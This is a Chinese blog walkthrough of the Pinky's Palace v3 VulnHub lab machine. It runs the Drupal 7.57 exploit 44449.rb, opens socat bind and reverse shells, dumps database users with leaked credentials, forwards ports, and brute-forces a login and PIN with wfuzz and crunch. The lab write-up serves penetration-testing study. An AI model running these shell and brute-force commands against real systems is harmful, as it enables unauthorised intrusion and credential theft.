2、靶机——Pinkys-Place v3(2)

已于 2023-09-23 21:32:37 修改
阅读量439 收藏
点赞数
分类专栏: vulhub 文章标签: 安全
于 2023-09-22 16:42:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/133093466
版权

文章目录

一、获取flag2

  21端口的信息用完了,再研究下8000端口。

在这里插入图片描述

1.1 访问web网站

  访问192.168.92.3:8000

在这里插入图片描述
  是一个登录网站,网站内容透露username是pinkadmin。根据之前nmap的结果,发现了一些网站路径。

其中,changelog.txt文件是一个(软件)更新日志文件。

1.2 查看日志文件

  访问192.168.92.3:8000/CHANGELOG.txt

在这里插入图片描述

可以发现,Drupal(CMS)的版本是7.57。CMS可以理解为网站模板。

1.2 查看Drupal漏洞

(1)使用searchsploit命令直接查找Drupal 7.57的漏洞。

在这里插入图片描述

注:searchsploit是一个用于Exploit-DB的命令行搜索工具,Kali Linux中保存了一个该漏洞库的拷贝,可以帮助我们查找渗透模块。

(2)下载脚本

  • 可以去 https://www.exploit-db.com/exploits/44449 下载;
  • 也可以直接使用kali中保存的副本,路径:/usr/share/exploitdb/exploit/php/webapps/44449.rb

在这里插入图片描述
在这里插入图片描述

运行ruby程序,需要安装highline。

(3)安装highline
  因为是要安装ruby的包(highline),所以需要用到ruby的包管理器gem,就相当于下载python安装包时需要使用pip一样。

在这里插入图片描述

1.3 获取shell

  payload:ruby 44449.rb http://192.168.92.3:8000

在这里插入图片描述

拿到shell!

在这里插入图片描述

获取flag2。

二、获取flag3

2.1 信息收集

  使用ls -al查看该目录下所有文件及其属性。

在这里插入图片描述

  关于文件属性,以下面两个文件的文件属性为例:

-rw-r--r--  1 root     root         28 Aug 14 18:01 flag2.txt
drwxr-xr-x  4 www-data www-data   4096 Feb 21  2018 sites
  • 最左边的d-,分别表示目录文件和普通文件。
  • rwx分别表示可读(read)可写(write)可执行(execute)。
  • drwxr-xr-x可划分为d|rwx|r-x|r-x,分别代表文件类型、文件所有者权限、用户组权限和其他用户权限。
  • www-data www-data,第一个www-data代表文件所有者,第二个www-data代表文件所有者所属的组。
  • 总的来说,文件所有者www-data对该文件具有读写执行的权限,属于www-data这个组的成员对该文件具有读和执行的权限,而其他用户只有执行的权限。

  尝试进入目录,失败。

在这里插入图片描述

2.2 利用socat获取稳定权限

  socat是nc(瑞士军刀)的一个变种,基本命令如下:

	socat [参数] <地址1> <地址2>

  简单来说,socat所做的事就是:把左边地址的输出数据传给右边,同时又把右边输出的数据传到左边。具体请参考:新版瑞士军刀:socat

  因为靶机的防火墙规则使得靶机不能主动建立TCP连接,所以我们使用socat建立正向shell,下面是相关命令:

	socat TCP-LISTEN:1111,reuseaddr,fork EXEC:bash,pty,stdeer,setsid,sigint,sane // 靶机
	socat file:`tty`,raw,echo=0 tcp:192.168.92.3:1111 // kali

在这里插入图片描述

2.3 获取数据库信息

  翻遍目录,发现 var/www/html/sites/default/settings 里面好像有东西,得到数据库名、用户名和密码。

在这里插入图片描述

2.4 连接mysql数据库

	mysql -u dpink -p // 连接数据库
	drupink

在这里插入图片描述

	show databases; // 查看数据库名
	use drupal; // 打开数据库
	show tables; // 显示数据表
	select * from users; // 查询
	select name,pass from users;

在这里插入图片描述

似乎无法解密。

在这里插入图片描述

2.5 查看靶机开放的端口信息

	netstat -a // -a:显示所有链接和监听端口

在这里插入图片描述

  关于Local Address的解释:

  • 0.0.0.0:9999表示监听服务器上所有IP地址的9999端口。一个服务器可能有多个IP地址。
  • localhost:65334表示监听本机回环地址的65334端口(如果某个服务只监听回环地址,那么只能在本机进行访问,无法通过TCP/IP协议进行远程访问)。
  • [::]:5555表示监听IPV6的回环地址的5555端口。
  • 192.168.92.3:1111表示监听192.168.92.3的1111端口,可以通过TCP/IP协议进行远程访问。

  既然本机开放了80端口和65334端口,但是只允许本机访问,那么我们需要使用socat进行端口转发,使得外部设备能够访问80端口和65334端口上的服务。

2.6 端口转发

  命令如下:

	socat tcp-listen:8888,fork tcp:127.0.0.1:80 & //靶机

  上述命令的大概意思就是靶机上监听8888端口,将8888端口的流量发送给127.0.0.1:80,实现本地转发。

在这里插入图片描述

  通过nmap -sV 192.168.92.3获得服务版本的详细信息。

在这里插入图片描述

2.7 访问web服务

  在kali上访问192.168.92.3:7777,显示数据库正在开发。

在这里插入图片描述

  在kali上访问192.168.92.3:8888,发现后台登录页面。简单试了一下,不存在SQL注入,下面进行爆破。
在这里插入图片描述

2.8 利用wfuzz模糊测试

(1)wfuzz简介

  Wfuzz是一款为了评估WEB应用而生的模糊测试工具,它基于一个简单的理念,即用给定的Payload去fuzz。它允许在HTTP请求里注入任何输入的值,针对不同的WEB应用组件进行多种复杂的爆破攻击。比如:参数、认证、表单、目录/文件、头部等等,这款工具在kali里面自带。

(2)目录遍历

  既然7777端口显示数据库正在开发,遍历下目录,看看有没有发现。命令:

	wfuzz --sc 200 -w /usr/share/wordlists/dirb/common.txt "http://192.168.92.3:7777/FUZZs.db"
  • --sc 200 表示显示响应码为200的请求
  • -w <路径>表示字典路径
  • FUZZ表示fuzz的部分,就相当于一个变量。加s纯属是字典中的值没有复数s。
  • .db是为了跑数据库文件

在这里插入图片描述
在这里插入图片描述

加s才能将db文件跑出来,也就是说字典很重要,字典里有就能跑出来,没有就跑不出。

  访问192.168.92.3:7777/pwds.db,可以拿到一个密码字典,其中的密码可能是那个GUESS网址的密码。
在这里插入图片描述

一共18条密码。

2.9 获取用户名

  linux下/etc/passwd是一个文本文件,其中包含了登录linux系统所必须的每个用户的信息,会保存用户名和密码等信息,只是密码不是明文保存,且保存在/etc/shadow文件中。
/etc/passwd中的一行信息为例:

root:x:0:0:root:/root:/bin/bash

  /etc/passwd文件将每个用户的详细信息写为一行,其中包含七个字段,每个字段之间用冒号:分隔:

字段含义
用户名用户登录密码时使用的用户名
密码密码,x表示用户设有密码,但是密码保存在/etc/shadow
UID用户ID,用于识别用户权限(超级用户、系统用户、普通用户)
GID用户初始值组ID
描述性信息描述
主目录用户的主目录,例如:root主目录为/root,普通用户kali的主目录为/home/kali
默认shelllinux系统默认使用/bin/bash,还有其他命令解释器,如/bin/zsh

  查看cat /etc/passwd

在这里插入图片描述

  发现如下关键用户名:root、pinky、pinksec、pinksecmanagement,再加上访问8000端口时提示pinkadmin,一共5个用户名。

2.10 用户名、密码和pin破解

(1)用户名和密码的破解

  因为5*18*10^5 =9*10^6,计算量巨大。因此,首先固定pin值进行爆破。将用户名和密码分别保存在user.txtpasswd.txt中,使用wfuzz进行爆破,命令如下:

	wfuzz -w user.txt -w passwd.txt -d "user=FUZZ&pass=FUZ2Z&pin=12345" http://192.168.208.138:2222/login.php

-d代表使用post数据。

在这里插入图片描述

返回值不一样,得到用户名和密码。

(2)pin破解

  使用crunch生成5位数字,命令如下:

	crunch 5 5 1234567890 > pin.txt
  • crunch语法:crunch <min-len> <max-len> [<charset string>] [options]
  • min-len表示生成的最小长度字符串;
  • max-len表示生成的最大长度字符串;
  • charset string表示字符集设置
    在这里插入图片描述
	wfuzz --hh 41,45 -w pin.txt -d "user=pinkadmin&pass=AaPinkSecaAdmin4467&pin=FUZZ" http://192.168.92.3:8888/login.php
  • --hh:过滤chars值为41和45的响应。

在这里插入图片描述

pin值为23081。

  登录去咯~,登录后发现有一个可执行窗口。

在这里插入图片描述
  反弹shell:

	socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:3333,bind=0.0.0.0,reuseaddr,fork // 靶机,网页
	socat file:`tty`(不是单引号),raw,echo=0 tcp:192.168.92.3:3333 // kali

在这里插入图片描述

注意:反弹shell和正向shel的区别(个人理解)

  • 正向shell是在靶机上新建了一个窗口,然后kali去连接该shell;
  • 反弹shell是靶机上存在一个shell,将其反弹给kali。

在这里插入图片描述

  将正向shell的命令使用到网页上,kali上无法拿到shell。

在这里插入图片描述
  之后就是常规操作,flag3在/home/pinksec/bin/flag3.txt

在这里插入图片描述

PT_silver
关注
专栏目录
小白的靶机VulnHub-Pinky‘s Palace: v3
wo41ge的博客
02-19 1万+
靶机地址:https://www.vulnhub.com/entry/pinkys-palace-v3,237/ 开机界面 就是这样 确定了靶机的IP地址:192.168.106.150 靶机开放了21、5555、8000端口 一个一个来 21端口 ftp服务可以匿名访问 5555端口有ssh服务 8000端口有http服务 运行了Drupal 打开康康 让我们尽量不要使用metasploit工具 kali上ftp匿名登录 去底层 康康 匿名登录 就是 账号:ftp 密码:空 这边遇到一个问题
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4812
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
3、靶场——Pinkys-Place v3(3)
最新发布
qq_55202378的博客
09-23 194
Pinky-Place vulhub
1、靶机——Pinkys-Place v3(1)
qq_55202378的博客
09-20 756
Pinkys-Place
【甄选靶场】Vulnhub百个项目渗透——项目三十六:PinkysPalace-v3(隧道搭建,内网穿透,登录爆破,格式化字符串缓冲区溢出漏洞,insmod提权)
人间体佐菲的博客
10-10 1361
【甄选靶场】Vulnhub百个项目渗透——项目三十六:PinkysPalace-v3(隧道搭建,内网穿透,登录爆破,格式化字符串缓冲区溢出漏洞,insmod提权)
No.36-VulnHub-Pinky's Palace: v3-Walkthrough渗透学习
qq_34801745的博客
01-30 1489
** VulnHub-Pinky’s Palace: v3-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/pinkys-palace-v3,237/ 靶机难度:中级(CTF) 靶机发布日期:2018年5月15日 靶机描述: 无???!!!。 目标:得到root权限&找到flag.txt 作者:大余 时间:2020-01-29 请注意:对...
ISCC--实战第一阶段(记Drupal漏洞利用)
qq_73767109的博客
05-19 433
或者进入pycharm中(如果是用pycharm的话)在里面搜索beautifulsoup4下载即可。使用最常见的cve-2018-7600漏洞。如果报错可以尝试进入python输入。输入ps -ef查看进程即可。按要求下载VPN连接后。用linux搜索相关漏洞。在网上搜索该漏洞的poc。把地址改成需要利用的地址。
Vulnhub靶机实战——DC-3
冠霖L的博客
09-27 9118
靶机DC-3下载地址:https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https://download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取到靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然...
靶机渗透训练——JIS-CTF-VulnUpload-CTF01
z7sz的博客
06-22 495
这是一篇关于JIS-CTF-VulnUpload-CTF01靶机训练的文章
靶机渗透——DC-2
Lorezon的博客
04-14 296
扫描靶机IP nmap一波
Vulnhub靶机实战——DC-1
冠霖L的博客
09-27 1988
靶机DC-1下载地址:https://download.vulnhub.com/dc/DC-1.zip 描述:靶机DC-1共有5个flag,并且需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.130 Kali的IP地址:192.168.220.131 本...
Drupal远程代码执行漏洞(CVE-2018-7602)
weixin_46411728的博客
08-24 1457
CVE-2018-7602
漏洞复现-Drupal远程代码执行漏洞(CVE-2018-7602)
qq_45751902的博客
10-23 2168
的多个子系统中存在一个远程执行代码漏洞。这可能允许攻击者利用 Drupal 站点上的多个攻击媒介,从而导致该站点受到威胁。此漏洞与 Drupal 核心 - 高度关键 - 远程代码执行 - SA-CORE-2018-002 有关。SA-CORE-2018-002 和此漏洞都在野外被利用。-c 后面接命令,紧随账号,密码。
Drupal 远程代码执行漏洞(CVE-2018-7602)
黑白的博客
12-28 3052
声明 好好学习,天天向上 漏洞描述 4月25日,Drupal官方发布通告,Drupal Core 存在一个远程代码执行漏洞,影响 7.x 和 8.x 版本。据分析,这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的,通告还称,已经发现了这个漏洞和CVE-2018-7600的在野利用 影响范围 Drupal 6.x,7.x,8.x 复现过程 这里使用7.57版本 使用vulhub /app/vulhub-master/drupal/CVE-2018-7602 使用docker启动 dock
Drupal远程代码执行漏洞(CVE-2019-6339)
weixin_46411728的博客
08-25 2659
Drupal 远程代码执行漏洞(CVE-2019-6339)
Vulbhub-hackNos
wwxxss
02-25 190
接下来的思路就是先把靶机的passwd文件搞过来,在其中创建一个新用户,然后把新的passwd文件还回去即可在靶机上获取一个高权限用户。蚁剑连接后,我无法尝试反弹shell,在此我们了解到一个新工具weevely也可以进行反弹shell。蚁剑连接成功后,我们需要进行提权,首先在kali中监听端口,进行反弹shell。可以看到用户泄露,我们对admin进行解密得到其密码为admin 123。解密后还是一个加密是一个brainfuck加密,我们使用许愿星进行解密。因此我们可以进行上传马,我们使用蚁剑连接。
Drupal 远程代码执行漏洞(CVE-2019-6339)
limb0的博客
07-04 9054
Drupal 远程代码执行漏洞(CVE-2019-6339) 一、漏洞介绍 Drupal core是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper(PHP)存在远程代码执行漏洞。远程攻击者可利用该漏洞执行任意的php代码。 二、漏洞危害 远程代码执行。 三、漏洞验证 环境搭建: 实验环境 系统 IP地址 攻击
Drupal 7.31版本最新漏洞利用个人完整总结,共享出来(附上利用源码)
What_Happened的博客
11-25 3295
2014年10月16日有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。        通过测试,我总结了一套完整的利用过程。       (1)利用google查找潜在的目标,关键字很多啦,比如:in
Drupal 7.31SQL注入getshell漏洞利用详解及EXP
weixin_33759269的博客
11-25 1093
0x00 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp不再深入下去。   0x01 关于漏洞的原理和POC在我的博客上已经有文章进行解释,这里只是着重说一下利用过程。配合POC的效果,我主要是从远程代码执行和GetShell方面去做的利用。 远程代码执行利用: 1...
vulnhub靶机——raven: 2
09-03
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值